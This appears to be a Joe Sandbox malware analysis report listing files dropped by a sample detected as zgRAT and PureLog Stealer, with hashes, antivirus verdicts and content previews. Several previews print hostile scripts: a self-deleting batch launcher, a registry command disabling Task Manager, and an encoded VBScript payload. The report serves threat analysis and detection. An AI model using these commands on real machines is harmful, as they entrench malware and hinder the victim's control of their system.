                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:CSV text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):847
                                                                                                                  Entropy (8bit):5.354334472896228
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):40960
                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):106496
                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):28672
                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):219
                                                                                                                  Entropy (8bit):5.307170642846334
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:hCijTg3Nou1SV+DE1WD5WAHovKOZG1wkn23fDi:HTg9uYDEoWffbi
                                                                                                                  MD5:2B0484A9BFA00886E410C27A66725717
                                                                                                                  SHA1:6E3D05D27E4DC13767F496000CF4CE0FF29DADB7
                                                                                                                  SHA-256:558A97B59B446E369EE0517ABFDA0342A1C5D8FD6956938C8E3B52D42FE37842
                                                                                                                  SHA-512:FE4D2CDA7BFD3A66202991A66C07207F5EBAF66CE8E9AE872695EEF6B98BCE351DD5F2EC641DD000C2D19052F8090C6DE79818A8E8CEB46A44898552EF9CE05D
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\IwAYZ2SgOs.bat"
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):98304
                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):114688
                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25
                                                                                                                  Entropy (8bit):4.023465189601646
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:z28dMch:z2Uh
                                                                                                                  MD5:C8327C8932A13954AEFC423516FD2AAA
                                                                                                                  SHA1:1F6D21D17BF96CA0B0E5E6CAD8B3B50E8853B205
                                                                                                                  SHA-256:A13BF1A460900871E9A0D514DC61BA74741A14BCAE9B9AB7053AB370E28D431E
                                                                                                                  SHA-512:AE96C536E57F1FA60D73CBB0C3E760C5F705D9952661B9791A14A709E2B4CD7F2FE25669FE94B3F092FE94125123B8338980B3DE146DDB76EB14706AD0ADD528
                                                                                                                  Malicious:false
                                                                                                                  Preview:0XQkvaaQc5CXBUMzjQhmamLMY
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25
                                                                                                                  Entropy (8bit):4.293660689688185
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:ktAmYn:ktLY
                                                                                                                  MD5:006B3D82ACB281E4F3BEEA4237096A50
                                                                                                                  SHA1:D76466BF350F5967EDA17BCEB3A893A54DBBC479
                                                                                                                  SHA-256:FC88EB9355D81FAA9FFE363D035E1198EE453C662A5B5A49067743B0303C87D0
                                                                                                                  SHA-512:097D7CABB1F6021B9484301DB6D0EC691307DBEACDA04D787FE6D2BA1D181EC81287D90A408DAF4C31AD6A9332967BC654D77227F4ACA7B9322B6A5AC9609097
                                                                                                                  Malicious:false
                                                                                                                  Preview:lsdIle5hWQ9FWhYMoX4RlrCjN
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):49152
                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):114688
                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):40960
                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):106496
                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):119
                                                                                                                  Entropy (8bit):5.624578137290537
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:G4kTbauFwCWUKSVdQ5nBY8CdYecHDNnZnVZTiIfw9D:Ra2uJJVISuJZfiIgD
                                                                                                                  MD5:A4359DA3ECA1D4FDC5DFA7430D9A875A
                                                                                                                  SHA1:79119EB631D72740BC951F8CCE15ED7BF2A4EB8F
                                                                                                                  SHA-256:7E6601792F792EC44A8EA39E10F51D22D89D17F7D265DABE31E80704E5A20D13
                                                                                                                  SHA-512:E893A274E2C4BB0E3D3D779F7D38B4B4D93F28E9CC7122702F2481D959EA3D9E4BA9D67CF2BB80477DE2C2BEC967B42422168EDD2D4C0509C219368736D4281C
                                                                                                                  Malicious:false
                                                                                                                  Preview:3WFy0cc7ddJqL2v4U9LlK2Rw824VUgTuq0EUl4QLAvAvJwQIxEFtBp6BESz7iHn7JY9VxaTZs9lY1fnMmvhPbksB3CQSFTn3IDmuw4UXvpBCEhJionVwjXf
                                                                                                                  Process:C:\Users\user\Desktop\1znAXdPcM5.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1914880
                                                                                                                  Entropy (8bit):7.534170827701139
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:EnLovDNcTi5jSVBKMnxDna7WnKCVylxXxOEd8r0S40J7Sf0gROFgADOCuiywyCbP:EM5aaeNylOhr0Skf0CulFFy
                                                                                                                  MD5:86AF92730370230540800E6D509E4155
                                                                                                                  SHA1:06083BA4BE5095FB3E43C12EF9CD57468CFA8898
                                                                                                                  SHA-256:FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                                                                                                  SHA-512:110AD5965F9B84F827673F252C8BDBD1080C938AD32565238E8EB754D5B5FD86D82CE1742F2879104D3DD8111F3693441944BE39180929A7FA5C30DFCFECF3AC
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                  Process:C:\Users\user\Desktop\1znAXdPcM5.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):233
                                                                                                                  Entropy (8bit):5.305875788535952
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:3YwZAQGoBZwXD9so3KRfyM1K7eB/k+7W34hebJNAKyMhF7FKHgcAcLEoMGwXKAyA:7+QGcStuH1jhRiI36B1ylOvRH1CUUX8
                                                                                                                  MD5:0118E08ABDA66456BD63E2BCC55D05B2
                                                                                                                  SHA1:64387CA359C51E4B5AD571A5785582173EFB9969
                                                                                                                  SHA-256:573FAD0F77FFC485919076815A6EEC0D81ED693FD0D1EB64C1349F2E3969B709
                                                                                                                  SHA-512:E1956EDC77FE34141F9169C895E277053F914F3608107E14182898F54F4DA24E2E78CFCCC1B6E6A3DCF47CE9500C0A933D7D4184C999DA60218543E4697D6562
                                                                                                                  Malicious:false
                                                                                                                  Preview:%wCJWFzT%reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f%SwQ%..%ImbymPb%"%AppData%\/Local/discord/surrogateWinMonitordll/Agentcomponentbrokermonitordhcp.exe"%PZPSNyOzVeKF%
                                                                                                                  Process:C:\Users\user\Desktop\1znAXdPcM5.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):271
                                                                                                                  Entropy (8bit):6.022320481512106
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:GzWvwqK+NkLzWbHY08nZNDd3RL1wQJRZ7SpQofri+DDdiIgRhb7wtR1:Ga2MCzWLY04d3XBJr7SpDri+DDdcRNG7
                                                                                                                  MD5:6C5F55FA14BA94A77A32D2D9F01E75C9
                                                                                                                  SHA1:069A1690C9143193F4FBAB01ED46DBC690EF06B3
                                                                                                                  SHA-256:C8149BF4A25A4E56D82163BC6C3A61FF83BAF6280E04C1B6BB58E616B1451D3A
                                                                                                                  SHA-512:25F1BF1803C23253FDB0CC83338FB5CE390292F2B802B5E06FDAABE1367EA4BAE9EBA8504C486B3894C8195E50D4782B8858B3D0B42C4FCE33BBC3CEE32B6E05
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  Preview:#@~^9gAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~Ju)aw9mYm]zJSK^l^z[kkmG.9z/!.DKolDn.k.HKxrYG.9VszJ3Sbc(4oF+uh5 i/m6b+UIoGyqWCnUXg91}"h!ezDn_(p:m/dn 4mYr~~!S~6ls/.QFAAAA==^#~@.
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32256
                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):32256
                                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23552
                                                                                                                  Entropy (8bit):5.519109060441589
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):69632
                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
